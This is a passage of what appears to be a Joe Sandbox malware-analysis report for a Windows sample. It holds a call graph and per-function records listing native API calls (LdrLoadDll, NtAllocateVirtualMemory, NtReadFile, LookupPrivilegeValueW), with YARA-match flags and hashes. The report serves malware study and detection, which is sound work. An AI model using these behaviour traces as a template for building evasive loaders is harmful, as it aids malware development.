cf45d9 95407->95410 95414 cf44aa 95407->95414 95409 cfa2e0 LdrLoadDll 95408->95409 95412 cf4476 95409->95412 95411 cfa2e0 LdrLoadDll 95410->95411 95417 cf45f4 95411->95417 95413 cfa490 2 API calls 95412->95413 95415 cf447f 95413->95415 95416 cfa2e0 LdrLoadDll 95414->95416 95415->95359 95418 cf44c5 95416->95418 95471 cfa320 LdrLoadDll 95417->95471 95419 cf44cc 95418->95419 95420 cf44e1 95418->95420 95423 cfa490 2 API calls 95419->95423 95424 cf44fc 95420->95424 95425 cf44e6 95420->95425 95422 cf462e 95426 cfa490 2 API calls 95422->95426 95427 cf44d5 95423->95427 95434 cf4501 95424->95434 95459 cfbf90 95424->95459 95428 cfa490 2 API calls 95425->95428 95429 cf4639 95426->95429 95427->95359 95430 cf44ef 95428->95430 95429->95359 95430->95359 95433 cf4567 95435 cf457e 95433->95435 95470 cfa2a0 LdrLoadDll 95433->95470 95441 cf4513 95434->95441 95462 cfa410 95434->95462 95437 cf459a 95435->95437 95438 cf4585 95435->95438 95440 cfa490 2 API calls 95437->95440 95439 cfa490 2 API calls 95438->95439 95439->95441 95442 cf45a3 95440->95442 95441->95359 95443 cf45cf 95442->95443 95465 cfbb90 95442->95465 95443->95359 95445 cf45ba 95446 cfbdc0 2 API calls 95445->95446 95447 cf45c3 95446->95447 95447->95359 95448->95331 95449->95354 95451 cfaf60 LdrLoadDll 95450->95451 95452 cf4d14 95451->95452 95453 cfa320 LdrLoadDll 95452->95453 95453->95358 95455 cfaf60 LdrLoadDll 95454->95455 95456 cfa4ac NtClose 95455->95456 95456->95361 95457->95341 95458->95405 95461 cfbfa8 95459->95461 95472 cfa630 95459->95472 95461->95434 95463 cfa42c NtReadFile 95462->95463 95464 cfaf60 LdrLoadDll 95462->95464 95463->95433 95464->95463 95466 cfbb9d 95465->95466 95467 cfbbb4 95465->95467 95466->95467 95468 cfbf90 2 API calls 95466->95468 95467->95445 95469 cfbbcb 95468->95469 95469->95445 95470->95435 95471->95422 95473 cfaf60 LdrLoadDll 95472->95473 95474 cfa64c RtlAllocateHeap 95473->95474 95474->95461 95605 cfa540 95475->95605 95477 cfbd6d 95477->95366 95479 cf4081 95478->95479 95480 cf4089 95478->95480 95479->95369 95481 cf435c 95480->95481 95608 cfcf30 95480->95608 95481->95369 95483 cf40dd 95484 cfcf30 2 API calls 95483->95484 95487 cf40e8 95484->95487 95485 cf4136 95488 cfcf30 2 API calls 95485->95488 95487->95485 95616 cfcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 95487->95616 95617 cfcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 95487->95617 95491 cf414a 95488->95491 95490 cf41a7 95492 cfcf30 2 API calls 95490->95492 95491->95490 95618 cfcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 95491->95618 95493 cf41bd 95492->95493 95495 cf41fa 95493->95495 95619 cfcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 95493->95619 95496 cfcf30 2 API calls 95495->95496 95498 cf4205 95496->95498 95506 cf423f 95498->95506 95620 cfcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 95498->95620 95502 cfcf90 2 API calls 95503 cf433e 95502->95503 95504 cfcf90 2 API calls 95503->95504 95505 cf4348 95504->95505 95507 cfcf90 2 API calls 95505->95507 95613 cfcf90 95506->95613 95508 cf4352 95507->95508 95509 cfcf90 2 API calls 95508->95509 95509->95481 95511 cf53a1 95510->95511 95512 cf4a50 8 API calls 95511->95512 95513 cf53b7 95512->95513 95514 cf5405 95513->95514 95515 cf53f2 95513->95515 95518 cf540a 95513->95518 95517 cfbdc0 2 API calls 95514->95517 95516 cfbdc0 2 API calls 95515->95516 95519 cf53f7 95516->95519 95517->95518 95518->95373 95519->95373 95621 cfac30 95520->95621 95523 cfac30 LdrLoadDll 95524 cfad8d 95523->95524 95525 cfac30 LdrLoadDll 95524->95525 95526 cfad96 95525->95526 95527 cfac30 LdrLoadDll 95526->95527 95528 cfad9f 95527->95528 95529 cfac30 LdrLoadDll 95528->95529 95530 cfada8 95529->95530 95531 cfac30 LdrLoadDll 95530->95531 95532 cfadb1 95531->95532 95533 cfac30 LdrLoadDll 95532->95533 95534 cfadbd 95533->95534 95535 cfac30 LdrLoadDll 95534->95535 95536 cfadc6 95535->95536 95537 cfac30 LdrLoadDll 95536->95537 95538 cfadcf 95537->95538 95539 cfac30 LdrLoadDll 95538->95539 95540 cfadd8 95539->95540 95541 cfac30 LdrLoadDll 95540->95541 95542 cfade1 95541->95542 95543 cfac30 LdrLoadDll 95542->95543 95544 cfadea 95543->95544 95545 cfac30 LdrLoadDll 95544->95545 95546 cfadf6 95545->95546 95547 cfac30 LdrLoadDll 95546->95547 95548 cfadff 95547->95548 95549 cfac30 LdrLoadDll 95548->95549 95550 cfae08 95549->95550 95551 cfac30 LdrLoadDll 95550->95551 95552 cfae11 95551->95552 95553 cfac30 LdrLoadDll 95552->95553 95554 cfae1a 95553->95554 95555 cfac30 LdrLoadDll 95554->95555 95556 cfae23 95555->95556 95557 cfac30 LdrLoadDll 95556->95557 95558 cfae2f 95557->95558 95559 cfac30 LdrLoadDll 95558->95559 95560 cfae38 95559->95560 95561 cfac30 LdrLoadDll 95560->95561 95562 cfae41 95561->95562 95563 cfac30 LdrLoadDll 95562->95563 95564 cfae4a 95563->95564 95565 cfac30 LdrLoadDll 95564->95565 95566 cfae53 95565->95566 95567 cfac30 LdrLoadDll 95566->95567 95568 cfae5c 95567->95568 95569 cfac30 LdrLoadDll 95568->95569 95570 cfae68 95569->95570 95571 cfac30 LdrLoadDll 95570->95571 95572 cfae71 95571->95572 95573 cfac30 LdrLoadDll 95572->95573 95574 cfae7a 95573->95574 95575 cfac30 LdrLoadDll 95574->95575 95576 cfae83 95575->95576 95577 cfac30 LdrLoadDll 95576->95577 95578 cfae8c 95577->95578 95579 cfac30 LdrLoadDll 95578->95579 95580 cfae95 95579->95580 95581 cfac30 LdrLoadDll 95580->95581 95582 cfaea1 95581->95582 95583 cfac30 LdrLoadDll 95582->95583 95584 cfaeaa 95583->95584 95585 cfac30 LdrLoadDll 95584->95585 95586 cfaeb3 95585->95586 95587 cfac30 LdrLoadDll 95586->95587 95588 cfaebc 95587->95588 95589 cfac30 LdrLoadDll 95588->95589 95590 cfaec5 95589->95590 95591 cfac30 LdrLoadDll 95590->95591 95592 cfaece 95591->95592 95593 cfac30 LdrLoadDll 95592->95593 95594 cfaeda 95593->95594 95595 cfac30 LdrLoadDll 95594->95595 95596 cfaee3 95595->95596 95597 cfac30 LdrLoadDll 95596->95597 95598 cfaeec 95597->95598 95598->95377 95600 cfaf60 LdrLoadDll 95599->95600 95601 cf9edc 95600->95601 95627 17c2df0 LdrInitializeThunk 95601->95627 95602 cf9ef3 95602->95298 95604->95374 95606 cfaf60 LdrLoadDll 95605->95606 95607 cfa55c NtAllocateVirtualMemory 95606->95607 95607->95477 95609 cfcf46 95608->95609 95610 cfcf40 95608->95610 95611 cfbf90 2 API calls 95609->95611 95610->95483 95612 cfcf6c 95611->95612 95612->95483 95614 cfbdc0 2 API calls 95613->95614 95615 cf4334 95614->95615 95615->95502 95616->95487 95617->95487 95618->95491 95619->95493 95620->95498 95622 cfac4b 95621->95622 95623 cf4e50 LdrLoadDll 95622->95623 95624 cfac6b 95623->95624 95625 cf4e50 LdrLoadDll 95624->95625 95626 cfad17 95624->95626 95625->95626 95626->95523 95627->95602 95629 17c2c1f LdrInitializeThunk 95628->95629 95630 17c2c11 95628->95630 95629->95383 95630->95383 95632 cfa68c RtlFreeHeap 95631->95632 95633 cfaf60 LdrLoadDll 95631->95633 95632->95387 95633->95632 95635 ce7eab 95634->95635 95636 ce7eb0 95634->95636 95635->95306 95637 cfbd40 2 API calls 95636->95637 95640 ce7ed5 95637->95640 95638 ce7f38 95638->95306 95639 cf9ec0 2 API calls 95639->95640 95640->95638 95640->95639 95641 ce7f3e 95640->95641 95645 cfbd40 2 API calls 95640->95645 95648 cfa5c0 95640->95648 95643 ce7f64 95641->95643 95644 cfa5c0 2 API calls 95641->95644 95643->95306 95646 ce7f55 95644->95646 95645->95640 95646->95306 95647->95308 95649 cfaf60 LdrLoadDll 95648->95649 95650 cfa5dc 95649->95650 95653 17c2c70 LdrInitializeThunk 95650->95653 95651 cfa5f3 95651->95640 95653->95651 95655 cfb5c3 95654->95655 95658 ceacf0 95655->95658 95659 cead14 95658->95659 95660 ce9c4a 95659->95660 95661 cead50 LdrLoadDll 95659->95661 95660->95269 95661->95660 95663 ceb063 95662->95663 95665 ceb0e0 95663->95665 95677 cf9c90 LdrLoadDll 95663->95677 95665->95276 95667 cfaf60 LdrLoadDll 95666->95667 95668 cef1bb 95667->95668 95668->95284 95669 cfa7d0 95668->95669 95670 cfa7ef LookupPrivilegeValueW 95669->95670 95671 cfaf60 LdrLoadDll 95669->95671 95670->95280 95671->95670 95673 cfa27c 95672->95673 95674 cfaf60 LdrLoadDll 95672->95674 95678 17c2ea0 LdrInitializeThunk 95673->95678 95674->95673 95675 cfa29b 95675->95283 95677->95665 95678->95675 95680 ceb1f0 95679->95680 95681 ceb040 LdrLoadDll 95680->95681 95682 ceb204 95681->95682 95682->95217 95684 ceae4d 95683->95684 95685 ceae51 95683->95685 95684->95219 95686 ceae9c 95685->95686 95687 ceae6a 95685->95687 95731 cf9cd0 LdrLoadDll 95686->95731 95730 cf9cd0 LdrLoadDll 95687->95730 95689 ceaead 95689->95219 95691 ceae8c 95691->95219 95693 cef4a0 3 API calls 95692->95693 95694 cf43c6 95693->95694 95694->95221 95732 ce87a0 95695->95732 95698 ce8a9d 95698->95223 95699 ce87a0 20 API calls 95700 ce8a8a 95699->95700 95700->95698 95750 cef710 10 API calls 95700->95750 95703 cfa501 95702->95703 95704 cfaf60 LdrLoadDll 95703->95704 95705 cfa51c 95704->95705 95874 17c2e80 LdrInitializeThunk 95705->95874 95706 cec322 95708 cef4a0 95706->95708 95709 cef4bd 95708->95709 95875 cf9fc0 95709->95875 95712 cef505 95712->95227 95713 cfa010 2 API calls 95714 cef52e 95713->95714 95714->95227 95716 cfa02c 95715->95716 95717 cfaf60 LdrLoadDll 95715->95717 95881 17c2d10 LdrInitializeThunk 95716->95881 95717->95716 95718 cec385 95718->95233 95718->95236 95721 cfaf60 LdrLoadDll 95720->95721 95722 cfa07c 95721->95722 95882 17c2d30 LdrInitializeThunk 95722->95882 95723 cec459 95723->95244 95726 cfaf60 LdrLoadDll 95725->95726 95727 cf9e3c 95726->95727 95883 17c2fb0 LdrInitializeThunk 95727->95883 95728 cec4ac 95728->95248 95730->95691 95731->95689 95733 ce7ea0 4 API calls 95732->95733 95747 ce87ba 95732->95747 95733->95747 95734 ce8a49 95734->95698 95734->95699 95735 ce8a3f 95787 ce8160 LdrLoadDll LdrInitializeThunk 95735->95787 95739 cf9f00 2 API calls 95739->95747 95743 cec4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95743->95747 95746 cf9e20 2 API calls 95746->95747 95747->95734 95747->95735 95747->95739 95747->95743 95747->95746 95748 cfa490 LdrLoadDll NtClose 95747->95748 95751 cf9d10 95747->95751 95754 ce85d0 95747->95754 95766 cef5f0 LdrLoadDll NtClose 95747->95766 95767 cf9d90 LdrLoadDll 95747->95767 95768 cf9dc0 LdrLoadDll 95747->95768 95769 cf9e50 LdrLoadDll 95747->95769 95770 ce83a0 95747->95770 95786 ce5f60 LdrLoadDll 95747->95786 95748->95747 95750->95698 95752 cfaf60 LdrLoadDll 95751->95752 95753 cf9d2c 95752->95753 95753->95747 95755 ce85e6 95754->95755 95788 cf9880 95755->95788 95757 ce8771 95757->95747 95758 ce85ff 95758->95757 95809 ce81a0 95758->95809 95760 ce86e5 95760->95757 95761 ce83a0 11 API calls 95760->95761 95762 ce8713 95761->95762 95762->95757 95763 cf9f00 2 API calls 95762->95763 95764 ce8748 95763->95764 95764->95757 95765 cfa500 2 API calls 95764->95765 95765->95757 95766->95747 95767->95747 95768->95747 95769->95747 95771 ce83c9 95770->95771 95853 ce8310 95771->95853 95774 ce83dc 95775 cfa500 2 API calls 95774->95775 95776 ce8467 95774->95776 95779 ce8462 95774->95779 95861 cef670 95774->95861 95775->95774 95776->95747 95777 cfa490 2 API calls 95778 ce849a 95777->95778 95778->95776 95780 cf9d10 LdrLoadDll 95778->95780 95779->95777 95781 ce84ff 95780->95781 95781->95776 95865 cf9d50 95781->95865 95783 ce8563 95783->95776 95784 cf4a50 8 API calls 95783->95784 95785 ce85b8 95784->95785 95785->95747 95786->95747 95787->95734 95789 cfbf90 2 API calls 95788->95789 95790 cf9897 95789->95790 95816 ce9310 95790->95816 95792 cf98b2 95793 cf98d9 95792->95793 95794 cf98f0 95792->95794 95795 cfbdc0 2 API calls 95793->95795 95797 cfbd40 2 API calls 95794->95797 95796 cf98e6 95795->95796 95796->95758 95798 cf992a 95797->95798 95799 cfbd40 2 API calls 95798->95799 95800 cf9943 95799->95800 95801 cf9be4 95800->95801 95822 cfbd80 95800->95822 95807 cfbdc0 2 API calls 95801->95807 95804 cf9bd0 95805 cfbdc0 2 API calls 95804->95805 95806 cf9bda 95805->95806 95806->95758 95808 cf9c39 95807->95808 95808->95758 95810 ce829f 95809->95810 95812 ce81b5 95809->95812 95810->95760 95811 cf4a50 8 API calls 95813 ce8222 95811->95813 95812->95810 95812->95811 95814 cfbdc0 2 API calls 95813->95814 95815 ce8249 95813->95815 95814->95815 95815->95760 95817 ce9335 95816->95817 95818 ceacf0 LdrLoadDll 95817->95818 95819 ce9368 95818->95819 95821 ce938d 95819->95821 95825 cecf20 95819->95825 95821->95792 95846 cfa580 95822->95846 95826 cecf4c 95825->95826 95827 cfa1e0 LdrLoadDll 95826->95827 95828 cecf65 95827->95828 95829 cecf6c 95828->95829 95836 cfa220 95828->95836 95829->95821 95831 cecf8f 95831->95829 95843 cfa810 LdrLoadDll 95831->95843 95833 cecfa7 95834 cfa490 2 API calls 95833->95834 95835 cecfca 95834->95835 95835->95821 95837 cfa23c 95836->95837 95838 cfaf60 LdrLoadDll 95836->95838 95844 17c2ca0 LdrInitializeThunk 95837->95844 95838->95837 95839 cfa257 95839->95831 95845 17c2ea0 LdrInitializeThunk 95839->95845 95840 cfa29b 95840->95831 95843->95833 95844->95839 95845->95840 95847 cfa596 95846->95847 95848 cfaf60 LdrLoadDll 95847->95848 95849 cfa59c 95848->95849 95852 17c2f90 LdrInitializeThunk 95849->95852 95850 cf9bc9 95850->95801 95850->95804 95852->95850 95854 ce8328 95853->95854 95855 ceacf0 LdrLoadDll 95854->95855 95856 ce8343 95855->95856 95857 cf4e50 LdrLoadDll 95856->95857 95858 ce8353 95857->95858 95859 ce835c PostThreadMessageW 95858->95859 95860 ce8370 95858->95860 95859->95860 95860->95774 95862 cef683 95861->95862 95868 cf9e90 95862->95868 95866 cf9d6c 95865->95866 95867 cfaf60 LdrLoadDll 95865->95867 95866->95783 95867->95866 95869 cf9eac 95868->95869 95870 cfaf60 LdrLoadDll 95868->95870 95873 17c2dd0 LdrInitializeThunk 95869->95873 95870->95869 95871 cef6ae 95871->95774 95873->95871 95874->95706 95876 cfaf60 LdrLoadDll 95875->95876 95877 cf9fdc 95876->95877 95880 17c2f30 LdrInitializeThunk 95877->95880 95878 cef4fe 95878->95712 95878->95713 95880->95878 95881->95718 95882->95723 95883->95728

                                                              Executed Functions

                                                              Function 00CFA53A Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 195 cfa53a-cfa53b 196 cfa53d-cfa53f 195->196 197 cfa501-cfa539 call cfaf60 call 17c2e80 195->197 199 cfa596-cfa5b9 call cfaf60 call 17c2f90 196->199 200 cfa541-cfa556 196->200 203 cfa55c-cfa57d NtAllocateVirtualMemory 200->203 204 cfa557 call cfaf60 200->204 204->203
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00CFB134,?,00000000,?,00003000,00000040,00000000,00000000,00CE9CF3), ref: 00CFA579
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
                                                              • Instruction ID: 7efd101a0d680be1a2f77e939a799011784974f1bf73d40b9f7cbb5ddcdb3a77
                                                              • Opcode Fuzzy Hash: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
                                                              • Instruction Fuzzy Hash: 322127B6200209AFCB18DF88DC85EAB77ADEF8C754F108559BE1D9B241C630E811CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CEACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 240 ceacf0-cead19 call cfcc50 243 cead1f-cead2d call cfd070 240->243 244 cead1b-cead1e 240->244 247 cead2f-cead3a call cfd2f0 243->247 248 cead3d-cead4e call cfb4a0 243->248 247->248 253 cead67-cead6a 248->253 254 cead50-cead64 LdrLoadDll 248->254 254->253
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00CEAD62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction ID: b30c5c1fb2939544863c16f5e328806d4d5d61f8f54c8a77b74a6b97685ed84c
                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction Fuzzy Hash: 80015EB5E0020DABDF10DBA0DD42FADB7B89B54308F004595AA1997241F630EB089B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 255 cfa360-cfa376 256 cfa37c-cfa3b1 NtCreateFile 255->256 257 cfa377 call cfaf60 255->257 257->256
                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00CE9CF3,?,00CF4BB7,00CE9CF3,FFFFFFFF,?,?,FFFFFFFF,00CE9CF3,00CF4BB7,?,00CE9CF3,00000060,00000000,00000000), ref: 00CFA3AD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 047bdaca57433d830bb99344107ef243e4341ffac371f1798f8ed2c7c63c2585
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: DDF0BDB2200208ABCB48CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA35C Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 258 cfa35c-cfa3b1 call cfaf60 NtCreateFile
                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00CE9CF3,?,00CF4BB7,00CE9CF3,FFFFFFFF,?,?,FFFFFFFF,00CE9CF3,00CF4BB7,?,00CE9CF3,00000060,00000000,00000000), ref: 00CFA3AD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                              • Instruction ID: 391616856b7e5435d32f31f278c2a420418d37852f44c1edcf1cd0e025375611
                                                              • Opcode Fuzzy Hash: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                              • Instruction Fuzzy Hash: F4F01FB2214148ABCB08DFA8D884CEB77A9FF8C354B14864DFA0D93206D630E8518BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 261 cfa410-cfa426 262 cfa42c-cfa459 NtReadFile 261->262 263 cfa427 call cfaf60 261->263 263->262
                                                              APIs
                                                              • NtReadFile.NTDLL(00CF4D72,5EB65239,FFFFFFFF,00CF4A31,?,?,00CF4D72,?,00CF4A31,FFFFFFFF,5EB65239,00CF4D72,?,00000000), ref: 00CFA455
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: f133bcdb790fcb4376bf4818625b5ea1c882a75d77b3c5ff8175856fbe1d3b68
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: 9CF0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1D97251D630E811CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA40B Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 264 cfa40b-cfa459 call cfaf60 NtReadFile
                                                              APIs
                                                              • NtReadFile.NTDLL(00CF4D72,5EB65239,FFFFFFFF,00CF4A31,?,?,00CF4D72,?,00CF4A31,FFFFFFFF,5EB65239,00CF4D72,?,00000000), ref: 00CFA455
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                              • Instruction ID: 101136c30d166f14d99a40d93c98875dec7703bd301094dd5819e47bf6d51465
                                                              • Opcode Fuzzy Hash: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                              • Instruction Fuzzy Hash: 63F01DB2114049AFCB04DF98D880CEBB7ADEF8C214B15864DFA5C97211C630E855CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 267 cfa540-cfa57d call cfaf60 NtAllocateVirtualMemory
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00CFB134,?,00000000,?,00003000,00000040,00000000,00000000,00CE9CF3), ref: 00CFA579
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: f751b3d34b88091f4df05b657227753e464fc4aa07e9a79083ea9a9dd99b71cf
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: 2CF015B2200208ABCB14DF89CC81EAB77ADEF88754F118148BE0897241C630F810CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(00CF4D50,?,?,00CF4D50,00CE9CF3,FFFFFFFF), ref: 00CFA4B5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction ID: 59b69832f1dbce86ddad8ccce46d38195432994f37761a053084e2ff197c3aea
                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
